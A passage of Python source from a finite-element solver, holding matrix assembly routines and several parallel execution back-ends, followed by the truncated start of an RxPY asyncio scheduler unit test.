# nodeperelem = mesh.edges.shape[1]
# else:
# faces = np.copy(mesh.faces)
# nodeperelem = mesh.faces.shape[1]
# F = np.zeros((mesh.points.shape[0]*nvar,1))
# for face in range(faces.shape[0]):
# if boundary_condition.neumann_flags[face] == True:
# ElemTraction = boundary_condition.applied_neumann[face,:]
# # LagrangeFaceCoords = mesh.points[faces[face,:],:]
# # ParentGradientX = np.einsum('ijk,jl->kil', function_space.Jm, LagrangeFaceCoords)
# # detJ = np.einsum('i,i->i',function_space.AllGauss[:,0],np.abs(np.linalg.det(ParentGradientX)))
# external_traction = np.zeros((nodeperelem*nvar))
# N = np.zeros((nodeperelem*nvar,nvar))
# for counter in range(function_space.AllGauss.shape[0]):
# for i in range(nvar):
# N[i::nvar,i] = function_space.Bases[:,counter]
# external_traction += np.dot(N,ElemTraction)*function_space.AllGauss[counter,0]
# # RHS ASSEMBLY
# # for iterator in range(0,nvar):
# # F[faces[face,:]*nvar+iterator,0]+=external_traction[iterator::nvar]
# RHSAssemblyNative(F,np.ascontiguousarray(external_traction[:,None]),face,nvar,nodeperelem,faces)
return F
def AssembleBodyForces(boundary_condition, mesh, material, function_space):
nvar = material.nvar
ndim = material.ndim
nodeperelem = mesh.elements.shape[1]
ngauss = function_space.AllGauss.shape[0]
if boundary_condition.is_body_force_shape_functions_computed is False:
N = np.zeros((nodeperelem*nvar,nvar,ngauss))
for i in range(nvar):
N[i::nvar,i,:] = function_space.Bases
boundary_condition.__Nb__ = N
boundary_condition.is_body_force_shape_functions_computed = True
else:
N = boundary_condition.__Nb__
F = np.zeros((mesh.points.shape[0]*nvar,1))
# BODY FORCE IS APPLIED IN THE Z-DIRECTION
ElemTraction = np.zeros(nvar); ElemTraction[ndim-1] = -material.rho
for elem in range(mesh.nelem):
body_force = np.einsum("ijk,j,k->ik",N,ElemTraction,function_space.AllGauss[:,0]).sum(axis=1)
RHSAssemblyNative(F,np.ascontiguousarray(body_force[:,None]),elem,nvar,nodeperelem,mesh.elements)
# nvar = material.nvar
# ndim = material.ndim
# nodeperelem = mesh.elements.shape[1]
# F = np.zeros((mesh.points.shape[0]*nvar,1))
# # BODY FORCE IS APPLIED IN THE Z-DIRECTION
# ElemTraction = np.zeros(nvar); ElemTraction[ndim-1] = -material.rho
# for elem in range(mesh.nelem):
# # LagrangeElemCoords = mesh.points[mesh.elements[elem,:],:]
# body_force = np.zeros((nodeperelem*nvar))
# N = np.zeros((nodeperelem*nvar,nvar))
# for counter in range(function_space.AllGauss.shape[0]):
# for i in range(nvar):
# N[i::nvar,i] = function_space.Bases[:,counter]
# body_force += np.dot(N,ElemTraction)*function_space.AllGauss[counter,0]
# # RHS ASSEMBLY
# # for iterator in range(0,nvar):
# # F[faces[elem,:]*nvar+iterator,0]+=body_force[iterator::nvar]
# RHSAssemblyNative(F,np.ascontiguousarray(body_force[:,None]),elem,nvar,nodeperelem,mesh.elements)
return F
#---------------------------------------- EXPLICIT ASSEMBLY ROUTINES --------------------------------------------#
#----------------------------------------------------------------------------------------------------------------#
def AssembleExplicit_NoLLD_Traction(fem_solver, function_space, formulation, mesh, material, Eulerx, Eulerp):
# GET MESH DETAILS
C = mesh.InferPolynomialDegree() - 1
nvar = formulation.nvar
ndim = formulation.ndim
nelem = mesh.nelem
nodeperelem = mesh.elements.shape[1]
T = np.zeros((mesh.points.shape[0]*nvar,1),np.float64)
F = []
if fem_solver.has_moving_boundary:
F = np.zeros((mesh.points.shape[0]*nvar,1),np.float64)
for elem in range(nelem):
t, f = formulation.GetElementalMatricesInVectorForm(elem,
function_space, mesh, material, fem_solver, Eulerx, Eulerp)[:2]
if fem_solver.has_moving_boundary:
# RHS ASSEMBLY
RHSAssemblyNative(F,f,elem,nvar,nodeperelem,mesh.elements)
# INTERNAL TRACTION FORCE ASSEMBLY
RHSAssemblyNative(T,t,elem,nvar,nodeperelem,mesh.elements)
return T, F
def AssembleExplicit_NoLLD_Mass(fem_solver, function_space, formulation, mesh, material, Eulerx, Eulerp):
# GET MESH DETAILS
nvar = formulation.nvar
ndim = formulation.ndim
nelem = mesh.nelem
nodeperelem = mesh.elements.shape[1]
I_mass=[]; J_mass=[]; V_mass=[]
if fem_solver.mass_type == "lumped":
M = np.zeros((mesh.points.shape[0]*nvar,1),np.float64)
else:
# ALLOCATE VECTORS FOR SPARSE ASSEMBLY OF MASS MATRIX - CHANGE TYPES TO INT64 FOR DoF > 1e09
I_mass=np.zeros(int((nvar*nodeperelem)**2*nelem),dtype=np.int32)
J_mass=np.zeros(int((nvar*nodeperelem)**2*nelem),dtype=np.int32)
V_mass=np.zeros(int((nvar*nodeperelem)**2*nelem),dtype=np.float64)
M = []
for elem in range(nelem):
LagrangeElemCoords = mesh.points[mesh.elements[elem,:],:]
EulerElemCoords = Eulerx[mesh.elements[elem,:],:]
if formulation.fields == "electro_mechanics":
ElectricPotentialElem = Eulerp[mesh.elements[elem,:]]
else:
ElectricPotentialElem = []
# COMPUTE THE MASS MATRIX
if material.has_low_level_dispatcher:
mass = formulation.__GetLocalMass_Efficient__(function_space,material,LagrangeElemCoords,EulerElemCoords,fem_solver,elem)
else:
mass = formulation.GetLocalMass_Efficient(function_space,material,LagrangeElemCoords,EulerElemCoords,fem_solver,elem)
if fem_solver.mass_type == "lumped":
mass = formulation.GetLumpedMass(mass)
RHSAssemblyNative(M,mass,elem,nvar,nodeperelem,mesh.elements)
else:
# SPARSE ASSEMBLY - MASS MATRIX
I_mass_elem, J_mass_elem, V_mass_elem = formulation.FindIndices(mass)
SparseAssemblyNative(I_mass_elem,J_mass_elem,V_mass_elem,I_mass,J_mass,V_mass,
elem,nvar,nodeperelem,mesh.elements)
# SET MASS FLAG HERE
if fem_solver.is_mass_computed is False:
if fem_solver.mass_type == "consistent":
M = csr_matrix((V_mass,(I_mass,J_mass)),shape=((nvar*mesh.points.shape[0],
nvar*mesh.points.shape[0])),dtype=np.float64)
fem_solver.is_mass_computed = True
return M
def AssembleExplicit(fem_solver, function_space, formulation, mesh, material, Eulerx, Eulerp):
if fem_solver.has_low_level_dispatcher and fem_solver.is_mass_computed is True:
if not material.has_low_level_dispatcher:
raise RuntimeError("Cannot dispatch to low level module, since material {} does not support it".format(type(material).__name__))
if fem_solver.parallel:
T = ExplicitParallelLauncher(fem_solver, function_space, formulation, mesh, material, Eulerx, Eulerp)
return T[:,None], [], []
else:
T, F, M = _LowLevelAssemblyExplicit_(fem_solver, function_space, formulation, mesh, material, Eulerx, Eulerp)
return T[:,None], F, M
else:
if fem_solver.has_low_level_dispatcher:
if fem_solver.parallel:
T = ExplicitParallelLauncher(fem_solver, function_space, formulation, mesh, material, Eulerx, Eulerp)
else:
T = _LowLevelAssemblyExplicit_(fem_solver, function_space, formulation, mesh, material, Eulerx, Eulerp)[0]
try:
t_mass_assembly = time()
from Florence.VariationalPrinciple._MassIntegrand_ import __TotalConstantMassIntegrand__
if fem_solver.recompute_sparsity_pattern:
M, I_mass, J_mass, V_mass = __TotalConstantMassIntegrand__(mesh, function_space, formulation, fem_solver.mass_type)
if fem_solver.mass_type == "consistent":
M = csr_matrix((V_mass,(I_mass,J_mass)),shape=((formulation.nvar*mesh.points.shape[0],
formulation.nvar*mesh.points.shape[0])),dtype=np.float64)
else:
M, V_mass = __TotalConstantMassIntegrand__(mesh, function_space,
formulation, fem_solver.mass_type, fem_solver.recompute_sparsity_pattern,
fem_solver.squeeze_sparsity_pattern, fem_solver.indices, fem_solver.indptr,
fem_solver.data_global_indices, fem_solver.data_local_indices)
if fem_solver.mass_type == "consistent":
M = csr_matrix((V_mass,fem_solver.indices,fem_solver.indptr),shape=((formulation.nvar*mesh.points.shape[0],
formulation.nvar*mesh.points.shape[0])),dtype=np.float64)
# SET MASS FLAG HERE
if fem_solver.is_mass_computed is False:
fem_solver.is_mass_computed = True
t_mass_assembly = time() - t_mass_assembly
print("Assembled mass matrix. Time elapsed was {} seconds".format(t_mass_assembly))
return T[:,None], [], M
except ImportError:
# CONTINUE DOWN
warn("Low level mass assembly not available. Falling back to python version")
M = AssembleExplicit_NoLLD_Mass(fem_solver, function_space, formulation, mesh, material, Eulerx, Eulerp)
T, F = AssembleExplicit_NoLLD_Traction(fem_solver, function_space, formulation, mesh, material, Eulerx, Eulerp)
return T[:,None], F, M
#---------------------------------------- PARALLEL ASSEMBLY ROUTINES --------------------------------------------#
#----------------------------------------------------------------------------------------------------------------#
class ImplicitParallelZipper(object):
def __init__(self, fem_solver, function_space, formulation, mesh, material, Eulerx, Eulerp):
self.fem_solver = fem_solver.__class__(analysis_type=fem_solver.analysis_type,
analysis_nature=fem_solver.analysis_nature)
self.function_space = function_space
self.formulation = formulation
self.mesh = mesh
self.material = material
self.Eulerx = Eulerx
self.Eulerp = Eulerp
def ImplicitParallelExecuter_PoolBased(functor):
return _LowLevelAssembly_Par_(functor.fem_solver, functor.function_space,
functor.formulation, functor.mesh, functor.material, functor.Eulerx, functor.Eulerp)
def ImplicitParallelExecuter_ProcessBased(functor, proc, tups):
tup = _LowLevelAssembly_Par_(functor.fem_solver, functor.function_space,
functor.formulation, functor.mesh, functor.material, functor.Eulerx, functor.Eulerp)
tups[proc] = tup
# tups.append(tup) # FOR SERIAL CHECKS
def ImplicitParallelExecuter_ProcessQueueBased(functor, queue):
tups = _LowLevelAssembly_Par_(functor.fem_solver, functor.function_space,
functor.formulation, functor.mesh, functor.material, functor.Eulerx, functor.Eulerp)
queue.put(tups)
def ImplicitParallelLauncher(fem_solver, function_space, formulation, mesh, material, Eulerx, Eulerp):
from multiprocessing import Process, Pool, Manager, Queue
from contextlib import closing
# GET MESH DETAILS
nvar = formulation.nvar
ndim = formulation.ndim
nelem = mesh.nelem
nnode = mesh.points.shape[0]
nodeperelem = mesh.elements.shape[1]
local_capacity = int((nvar*nodeperelem)**2)
pmesh, pelement_indices, pnode_indices, partitioned_maps = fem_solver.pmesh, \
fem_solver.pelement_indices, fem_solver.pnode_indices, fem_solver.partitioned_maps
# ALLOCATE VECTORS FOR SPARSE ASSEMBLY OF STIFFNESS MATRIX - CHANGE TYPES TO INT64 FOR DoF > 1e09
I_stiffness=np.zeros((nelem,local_capacity),dtype=np.int32)
J_stiffness=np.zeros((nelem,local_capacity),dtype=np.int32)
V_stiffness=np.zeros((nelem,local_capacity),dtype=np.float64)
I_mass=[]; J_mass=[]; V_mass=[]
if fem_solver.analysis_type !='static' and fem_solver.is_mass_computed is False:
# ALLOCATE VECTORS FOR SPARSE ASSEMBLY OF MASS MATRIX - CHANGE TYPES TO INT64 FOR DoF > 1e09
I_mass=np.zeros((nelem,local_capacity),dtype=np.int32)
J_mass=np.zeros((nelem,local_capacity),dtype=np.int32)
V_mass=np.zeros((nelem,local_capacity),dtype=np.float64)
T = np.zeros((mesh.points.shape[0],nvar),np.float64)
funcs = []
for proc in range(fem_solver.no_of_cpu_cores):
pnodes = pnode_indices[proc]
Eulerx_current = Eulerx[pnodes,:]
Eulerp_current = Eulerp[pnodes]
funcs.append(ImplicitParallelZipper(fem_solver, function_space, formulation,
pmesh[proc], material, Eulerx_current, Eulerp_current))
# # SERIAL
# tups = []
# for i in range(fem_solver.no_of_cpu_cores):
# ImplicitParallelExecuter_ProcessBased(funcs[i], i, tups)
# for i in range(fem_solver.no_of_cpu_cores):
# pnodes = pnode_indices[i]
# pelements = pelement_indices[i]
# I_stiffness[pelements,:] = partitioned_maps[i][tups[i][0]].reshape(pmesh[i].nelem,local_capacity)
# J_stiffness[pelements,:] = partitioned_maps[i][tups[i][1]].reshape(pmesh[i].nelem,local_capacity)
# V_stiffness[pelements,:] = tups[i][2].reshape(pmesh[i].nelem,local_capacity)
# T[pnodes,:] += tups[i][-1].reshape(pnodes.shape[0],nvar)
# if fem_solver.analysis_type != "static" and fem_solver.is_mass_computed is False:
# I_stiffness[pelements,:] = partitioned_maps[i][tups[i][3]].reshape(pmesh[i].nelem,local_capacity)
# J_stiffness[pelements,:] = partitioned_maps[i][tups[i][4]].reshape(pmesh[i].nelem,local_capacity)
# V_stiffness[pelements,:] = tups[i][5].reshape(pmesh[i].nelem,local_capacity)
# POOL BASED
if fem_solver.parallel_model == "pool":
with closing(Pool(processes=fem_solver.no_of_cpu_cores)) as pool:
tups = pool.map(ImplicitParallelExecuter_PoolBased,funcs)
pool.terminate()
# THREAD POOL INSTEAD OF PROCESSING POOL
elif fem_solver.parallel_model == "thread_pool":
import multiprocessing.dummy
with closing(multiprocessing.dummy.Pool(fem_solver.no_of_cpu_cores)) as pool:
tups = pool.map(ImplicitParallelExecuter_PoolBased,funcs)
pool.terminate()
# DASK BASED
elif fem_solver.parallel_model == "dask":
try:
from dask.distributed import Client, LocalCluster
except ImportError:
raise ImportError("dask is not installed. Install it 'using pip install dask[complete]'")
# CREATE A DUMMY CALLABLE
# reducer = lambda tups: tups
# INITIALISE CLUSTER
# cluster = LocalCluster(n_workers=fem_solver.no_of_cpu_cores, processes=False, threads_per_worker=None)
# client = Client(cluster)
# client = Client() # FOR ACTUAL/REMOTE CLSUTERS
client = fem_solver.dask_client
future = client.scatter(funcs)
job = client.map(ImplicitParallelExecuter_PoolBased, future)
# MAP/REDUCE
# total = client.submit(reducer, job)
# tups = total.result()
# OR GATHER
tups = client.gather(job)
# client.close() # DONT CLOSE OTHERWISE FEMSOLVER HAS TO RELAUNCH
# JOBLIB BASED
elif fem_solver.parallel_model == "joblib":
try:
from joblib import Parallel, delayed
except ImportError:
raise ImportError("Joblib is not installed. Install it 'using pip install joblib'")
tups = Parallel(n_jobs=fem_solver.no_of_cpu_cores)(delayed(ImplicitParallelExecuter_PoolBased)(func) for func in funcs)
# tups = Parallel(n_jobs=10, backend="threading")(delayed(ImplicitParallelExecuter_PoolBased)(func) for func in funcs)
# SCOOP BASED
elif fem_solver.parallel_model == "scoop":
try:
from scoop import futures
except ImportError:
raise ImportError("Scoop is not installed. Install it 'using pip install scoop'")
# tups = futures.map(ImplicitParallelExecuter_PoolBased, funcs)
tups = list(futures.map(ImplicitParallelExecuter_PoolBased, funcs))
# PROCESS AND MANAGER BASED
elif fem_solver.parallel_model == "context_manager":
procs = []
manager = Manager(); tups = manager.dict() # SPAWNS A NEW PROCESS
for i, func in enumerate(funcs):
proc = Process(target=ImplicitParallelExecuter_ProcessBased, args=(func,i,tups))
procs.append(proc)
proc.start()
for proc in procs:
proc.join()
# PROCESS AND QUEUE BASED
elif fem_solver.parallel_model == "queue":
procs = []
for i, func in enumerate(funcs):
queue = Queue()
proc = Process(target=ImplicitParallelExecuter_ProcessQueueBased, args=(func,queue))
proc.daemon = True
procs.append(proc)
proc.start()
tups = queue.get()
pnodes = pnode_indices[i]
pelements = pelement_indices[i]
I_stiffness[pelements,:] = partitioned_maps[i][tups[0]].reshape(pmesh[i].nelem,local_capacity)
J_stiffness[pelements,:] = partitioned_maps[i][tups[1]].reshape(pmesh[i].nelem,local_capacity)
V_stiffness[pelements,:] = tups[2].reshape(pmesh[i].nelem,local_capacity)
T[pnodes,:] += tups[-1].reshape(pnodes.shape[0],nvar)
if fem_solver.analysis_type != "static" and fem_solver.is_mass_computed is False:
I_mass[pelements,:] = partitioned_maps[i][tups[3]].reshape(pmesh[i].nelem,local_capacity)
J_mass[pelements,:] = partitioned_maps[i][tups[4]].reshape(pmesh[i].nelem,local_capacity)
V_mass[pelements,:] = tups[5].reshape(pmesh[i].nelem,local_capacity)
proc.join()
if fem_solver.parallel_model == "pool" or fem_solver.parallel_model == "context_manager" \
or fem_solver.parallel_model == "joblib" or fem_solver.parallel_model == "scoop" \
or fem_solver.parallel_model == "dask" or fem_solver.parallel_model == "thread_pool":
for i in range(fem_solver.no_of_cpu_cores):
pnodes = pnode_indices[i]
pelements = pelement_indices[i]
I_stiffness[pelements,:] = partitioned_maps[i][tups[i][0]].reshape(pmesh[i].nelem,local_capacity)
J_stiffness[pelements,:] = partitioned_maps[i][tups[i][1]].reshape(pmesh[i].nelem,local_capacity)
V_stiffness[pelements,:] = tups[i][2].reshape(pmesh[i].nelem,local_capacity)
T[pnodes,:] += tups[i][-1].reshape(pnodes.shape[0],nvar)
if fem_solver.analysis_type != "static" and fem_solver.is_mass_computed is False:
I_mass[pelements,:] = partitioned_maps[i][tups[i][3]].reshape(pmesh[i].nelem,local_capacity)
J_mass[pelements,:] = partitioned_maps[i][tups[i][4]].reshape(pmesh[i].nelem,local_capacity)
V_mass[pelements,:] = tups[i][5].reshape(pmesh[i].nelem,local_capacity)
stiffness = csr_matrix((V_stiffness.ravel(),(I_stiffness.ravel(),J_stiffness.ravel())),
shape=((nvar*mesh.points.shape[0],nvar*mesh.points.shape[0])),dtype=np.float64)
F, mass = [], []
if fem_solver.analysis_type != "static" and fem_solver.is_mass_computed is False:
mass = csr_matrix((V_mass.ravel(),(I_mass.ravel(),J_mass.ravel())),
shape=((nvar*mesh.points.shape[0],nvar*mesh.points.shape[0])),dtype=np.float64)
return stiffness, T.ravel(), F, mass
class ExplicitParallelZipper(object):
def __init__(self, function_space, formulation, mesh, material, Eulerx, Eulerp):
self.function_space = function_space
self.formulation = formulation
self.mesh = mesh
self.material = material
self.Eulerx = Eulerx
self.Eulerp = Eulerp
class ExplicitParallelZipperMPI(object):
def __init__(self, formulation, mesh, material, pnodes):
self.formulation = formulation
self.material = material
self.mesh = mesh
self.pnodes = pnodes
class ExplicitParallelZipperHDF5(object):
def __init__(self, formulation, mesh, material):
self.formulation = formulation
self.material = material
self.mesh = mesh
def ExplicitParallelExecuter_PoolBased(functor):
return _LowLevelAssemblyExplicit_Par_(functor.function_space,
functor.formulation, functor.mesh, functor.material, functor.Eulerx, functor.Eulerp)
def ExplicitParallelExecuter_ProcessBased(functor, proc, Ts):
T = _LowLevelAssemblyExplicit_Par_(functor.function_space,
functor.formulation, functor.mesh, functor.material, functor.Eulerx, functor.Eulerp)
Ts[proc] = T
def ExplicitParallelExecuter_ProcessQueueBased(functor, queue):
T = _LowLevelAssemblyExplicit_Par_(functor.function_space,
functor.formulation, functor.mesh, functor.material, functor.Eulerx, functor.Eulerp)
queue.put(T)
def ExplicitParallelExecuter_HDF5Based(functor, proc, fname_in, fname_out):
import h5py
h5f_out = h5py.File(fname_out+str(proc)+'.h5','r')
Eulerx = h5f_out['Geometry']['Eulerx'][:]
Eulerp = h5f_out['Geometry']['Eulerp'][:]
functor.mesh.points = h5f_out['Geometry']['points'][:]
functor.mesh.elements = h5f_out['Geometry']['elements'][:]
T = _LowLevelAssemblyExplicit_Par_(functor.formulation.function_spaces[0],
functor.formulation, functor.mesh, functor.material, Eulerx, Eulerp)
# T = _LowLevelAssemblyExplicit_Par_(functor.formulation.function_spaces[0],
# functor.formulation, functor.mesh, functor.material, functor.Eulerx, functor.Eulerp)
h5f = h5py.File(fname_in+str(proc)+'.h5','w')
h5f.create_dataset('T', data=T)
h5f.close()
def ExplicitParallelLauncher(fem_solver, function_space, formulation, mesh, material, Eulerx, Eulerp):
from multiprocessing import Process, Pool, Manager, Queue
from contextlib import closing
pmesh, pelement_indices, pnode_indices = fem_solver.pmesh, fem_solver.pelement_indices, fem_solver.pnode_indices
T_all = np.zeros((mesh.points.shape[0],formulation.nvar),np.float64)
# MPI BASED
if fem_solver.parallel_model == "mpi":
try:
from mpi4py import MPI
except ImportError:
raise ImportError("mpi4py is not installed. Install it using 'pip install mpi4py'")
from Florence import PWD
comm = MPI.COMM_SELF.Spawn(sys.executable,
args=[PWD(__file__)+'/MPIParallelExplicitAssembler.py'],
maxprocs=fem_solver.no_of_cpu_cores)
funcs = []
for proc in range(fem_solver.no_of_cpu_cores):
obj = ExplicitParallelZipperMPI(formulation, pmesh[proc], material, pnode_indices[proc])
funcs.append(obj)
T_all_size = np.array([mesh.points.shape[0],formulation.ndim, formulation.nvar],dtype="i")
comm.Bcast([T_all_size, MPI.INT], root=MPI.ROOT)
comm.bcast(funcs, root=MPI.ROOT)
comm.Bcast([Eulerx, MPI.DOUBLE], root=MPI.ROOT)
comm.Bcast([Eulerp, MPI.DOUBLE], root=MPI.ROOT)
# for proc in range(fem_solver.no_of_cpu_cores):
# globals()['points%s' % proc] = pmesh[proc].points
# globals()['elements%s' % proc] = pmesh[proc].elements
# globals()['nelems%s' % proc] = pmesh[proc].elements.nelem
# globals()['nnodes%s' % proc] = pmesh[proc].points.nnode
# Main T_all TO BE FILLED
comm.Reduce(None, [T_all, MPI.DOUBLE], root=MPI.ROOT)
comm.Disconnect()
return T_all.ravel()
# PROCESS AND HDF5 BASED
elif fem_solver.parallel_model == "hdf5":
try:
import h5py
except ImportError:
raise ImportError("h5py is not installed. Install it using 'pip install h5py'")
import shutil
from Florence import Mesh
home = os.path.expanduser("~")
tmp_folder = os.path.join(home,".florence_tmp000")
if not os.path.exists(tmp_folder):
os.makedirs(tmp_folder)
fname_in = os.path.join(tmp_folder,"results_explicit")
fname_out = os.path.join(tmp_folder,"geometry_explicit")
# funcs = []
# for proc in range(fem_solver.no_of_cpu_cores):
# pnodes = pnode_indices[proc]
# Eulerx_current = Eulerx[pnodes,:]
# Eulerp_current = Eulerp[pnodes]
# obj = ExplicitParallelZipper(function_space, formulation,
# pmesh[proc], material, Eulerx_current, Eulerp_current)
# funcs.append(obj)
funcs = []
for proc in range(fem_solver.no_of_cpu_cores):
pnodes = pnode_indices[proc]
Eulerx_current = Eulerx[pnodes,:]
Eulerp_current = Eulerp[pnodes]
h5f_out = h5py.File(fname_out+str(proc)+'.h5','w')
grp = h5f_out.create_group('Geometry')
grp.create_dataset('elements', data=pmesh[proc].elements)
grp.create_dataset('points', data=pmesh[proc].points)
grp.create_dataset('Eulerx', data=Eulerx_current)
grp.create_dataset('Eulerp', data=Eulerp_current)
h5f_out.close()
imesh = Mesh()
imesh.nnode, imesh.nelem, imesh.element_type = pmesh[proc].nnode, pmesh[proc].nelem, pmesh[proc].element_type
obj = ExplicitParallelZipperHDF5(formulation, imesh, material)
funcs.append(obj)
procs = []
for i, func in enumerate(funcs):
proc = Process(target=ExplicitParallelExecuter_HDF5Based, args=(func, i, fname_in, fname_out))
procs.append(proc)
proc.start()
for proc in procs:
proc.join()
for proc in range(fem_solver.no_of_cpu_cores):
h5f = h5py.File(fname_in+str(proc)+'.h5','r')
T = h5f['T'][:]
pnodes = pnode_indices[proc]
T_all[pnodes,:] += T.reshape(pnodes.shape[0],formulation.nvar)
shutil.rmtree(tmp_folder)
return T_all.ravel()
funcs = []
for proc in range(fem_solver.no_of_cpu_cores):
pnodes = pnode_indices[proc]
Eulerx_current = Eulerx[pnodes,:]
Eulerp_current = Eulerp[pnodes]
obj = ExplicitParallelZipper(function_space, formulation,
pmesh[proc], material, Eulerx_current, Eulerp_current)
funcs.append(obj)
# SERIAL
# for proc in range(fem_solver.no_of_cpu_cores):
# T = ExplicitParallelExecuter_PoolBased(funcs[proc])
# pnodes = pnode_indices[proc]
# T_all[pnodes,:] += T.reshape(pnodes.shape[0],formulation.nvar)
# PROCESS AND MANAGER BASED
if fem_solver.parallel_model == "context_manager":
procs = []
manager = Manager(); Ts = manager.dict() # SPAWNS A NEW PROCESS
for i, func in enumerate(funcs):
proc = Process(target=ExplicitParallelExecuter_ProcessBased, args=(func,i,Ts))
procs.append(proc)
proc.start()
for proc in procs:
proc.join()
# POOL BASED
elif fem_solver.parallel_model == "pool":
with closing(Pool(processes=fem_solver.no_of_cpu_cores)) as pool:
Ts = pool.map(ExplicitParallelExecuter_PoolBased,funcs)
pool.terminate()
# DOESN'T SCALE WELL
# Ts = pool.map_async(ExplicitParallelExecuter_PoolBased,funcs)
# Ts.wait()
# Ts = Ts.get()
# THREAD POOL INSTEAD OF PROCESSING POOL
elif fem_solver.parallel_model == "thread_pool":
import multiprocessing.dummy
with closing(multiprocessing.dummy.Pool(fem_solver.no_of_cpu_cores)) as pool:
Ts = pool.map(ExplicitParallelExecuter_PoolBased,funcs)
pool.terminate()
# DASK BASED
elif fem_solver.parallel_model == "dask":
try:
from dask.distributed import Client, LocalCluster
except ImportError:
raise ImportError("dask is not installed. Install it 'using pip install dask[complete]'")
# CREATE A DUMMY CALLABLE
# reducer = lambda tups: tups
client = fem_solver.dask_client
future = client.scatter(funcs)
job = client.map(ExplicitParallelExecuter_PoolBased, future)
# total = client.submit(reducer, job)
# Ts = total.result()
Ts = client.gather(job)
# JOBLIB BASED
elif fem_solver.parallel_model == "joblib":
try:
from joblib import Parallel, delayed
except ImportError:
raise ImportError("Joblib is not installed. Install it using 'pip install joblib'")
Ts = Parallel(n_jobs=fem_solver.no_of_cpu_cores)(delayed(ExplicitParallelExecuter_PoolBased)(func) for func in funcs)
# Ts = Parallel(n_jobs=10, backend="threading")(delayed(ImplicitParallelExecuter_PoolBased)(func) for func in funcs)
# SCOOP BASED
elif fem_solver.parallel_model == "scoop":
try:
from scoop import futures
except ImportError:
raise ImportError("Scoop is not installed. Install it using 'pip install scoop'")
Ts = list(futures.map(ExplicitParallelExecuter_PoolBased, funcs))
# TBB BASED
elif fem_solver.parallel_model == "tbb":
try:
from TBB import Pool as tbbpool
except ImportError:
raise ImportError("TBB is not installed. The easiest way to install it is using ananconda - 'conda install intel tbb'")
with closing(tbbpool(nworkers=fem_solver.no_of_cpu_cores)) as pool:
Ts = pool.map(ExplicitParallelExecuter_PoolBased,funcs)
pool.terminate()
# PROCESS AND QUEUE BASED
elif fem_solver.parallel_model == "queue":
procs = []
for i, func in enumerate(funcs):
queue = Queue()
proc = Process(target=ExplicitParallelExecuter_ProcessQueueBased, args=(func,queue))
proc.daemon = True
procs.append(proc)
proc.start()
pnodes = pnode_indices[i]
T = queue.get()
T_all[pnodes,:] += T.reshape(pnodes.shape[0],formulation.nvar)
proc.join()
if fem_solver.parallel_model == "pool" or fem_solver.parallel_model == "context_manager" \
or fem_solver.parallel_model == "joblib" or fem_solver.parallel_model == "scoop" \
or fem_solver.parallel_model == "tbb" or fem_solver.parallel_model == "dask" \
or fem_solver.parallel_model == "thread_pool":
for proc in range(fem_solver.no_of_cpu_cores):
pnodes = pnode_indices[proc]
T_all[pnodes,:] += Ts[proc].reshape(pnodes.shape[0],formulation.nvar)
return T_all.ravel()
#---------------------------------------- HIIGHER LEVEL ASSEMBLY ROUTINE ----------------------------------------#
#----------------------------------------------------------------------------------------------------------------#
def AssembleMass(formulation, mesh, material, fem_solver, rho=1.0, mass_type=None, Eulerx=None):
t_mass_assembly = time()
if mesh.element_type == "tri" or mesh.element_type == "tet":
function_space = formulation.function_spaces[1]
else:
function_space = formulation.function_spaces[0]
mesh.ChangeType()
formulation.GetConstantMassIntegrand(function_space, material)
fem_solver.ComputeSparsityFEM(mesh, formulation)
if fem_solver.mass_type == None:
fem_solver.mass_type = "consistent"
try:
from Florence.VariationalPrinciple._MassIntegrand_ import __TotalConstantMassIntegrand__
if fem_solver.recompute_sparsity_pattern:
M, I_mass, J_mass, V_mass = __TotalConstantMassIntegrand__(mesh, function_space, formulation, fem_solver.mass_type)
if fem_solver.mass_type == "consistent":
M = csr_matrix((V_mass,(I_mass,J_mass)),shape=((formulation.nvar*mesh.points.shape[0],
formulation.nvar*mesh.points.shape[0])),dtype=np.float64)
else:
M, V_mass = __TotalConstantMassIntegrand__(mesh, function_space,
formulation, fem_solver.mass_type, fem_solver.recompute_sparsity_pattern,
fem_solver.squeeze_sparsity_pattern, fem_solver.indices, fem_solver.indptr,
fem_solver.data_global_indices, fem_solver.data_local_indices)
if fem_solver.mass_type == "consistent":
M = csr_matrix((V_mass,fem_solver.indices,fem_solver.indptr),shape=((formulation.nvar*mesh.points.shape[0],
formulation.nvar*mesh.points.shape[0])),dtype=np.float64)
except:
if Eulerx is None:
Eulerx = np.copy(mesh.points)
Eulerp = np.zeros(mesh.points.shape[0])
M = AssembleExplicit_NoLLD_Mass(fem_solver, function_space, formulation, mesh, material, Eulerx, Eulerp)
t_mass_assembly = time() - t_mass_assembly
return M
def AssembleForm(formulation, mesh, material, fem_solver, Eulerx=None, Eulerp=None):
from Florence import BoundaryCondition
boundary_condition = BoundaryCondition()
solver=None
fem_solver.__checkdata__(material, boundary_condition,
formulation, mesh, formulation.function_spaces, solver, contact_formulation=None)
if fem_solver.parallel:
import multiprocessing
if fem_solver.no_of_cpu_cores is None:
fem_solver.no_of_cpu_cores = multiprocessing.cpu_count()
if fem_solver.parallel_model is None:
if fem_solver.analysis_type == "dynamic" and fem_solver.analysis_subtype == "explicit":
fem_solver.parallel_model = "context_manager"
else:
fem_solver.parallel_model = "pool"
fem_solver.PartitionMeshForParallelFEM(mesh,fem_solver.no_of_cpu_cores,formulation.nvar)
if fem_solver.parallel_model=="dask" and fem_solver.is_dask_scheduler_initialised is False:
fem_solver.LaunchDaskDistributedClient()
mesh.ChangeType()
if Eulerx is None:
Eulerx = np.copy(mesh.points)
if Eulerp is None:
Eulerp = np.zeros(mesh.points.shape[0])
function_space = formulation.function_spaces[0]
fem_solver.is_mass_computed = True
if not fem_solver.parallel:
fem_solver.ComputeSparsityFEM(mesh, formulation)
if formulation.fields == "couple_stress" or formulation.fields == "flexoelectricity":
lmesh = mesh.GetLinearMesh(remap=True)
Eulerw = np.zeros_like(lmesh.points)
Eulers = np.zeros_like(lmesh.points)
return formulation.Assemble(fem_solver, material, Eulerx, Eulerw, Eulers, Eulerp)[:2]
return Assemble(fem_solver, function_space, formulation, mesh, material, Eulerx, Eulerp)[:2]
|
test_asynciothreadsafescheduler.py
|
import unittest
import asyncio
import threading
from datetime import datetime, timedelta
from rx.scheduler.eventloop import AsyncIOThreadSafeScheduler
class TestAsyncIOThreadSafeScheduler(unittest.TestCase):
def test_asyncio_threadsafe_schedule_now(self):
loop = asyncio.get_event_loop()
scheduler = AsyncIOThreadSafeScheduler(loop)
diff = scheduler.now - datetime.utcfromtimestamp(loop.time())
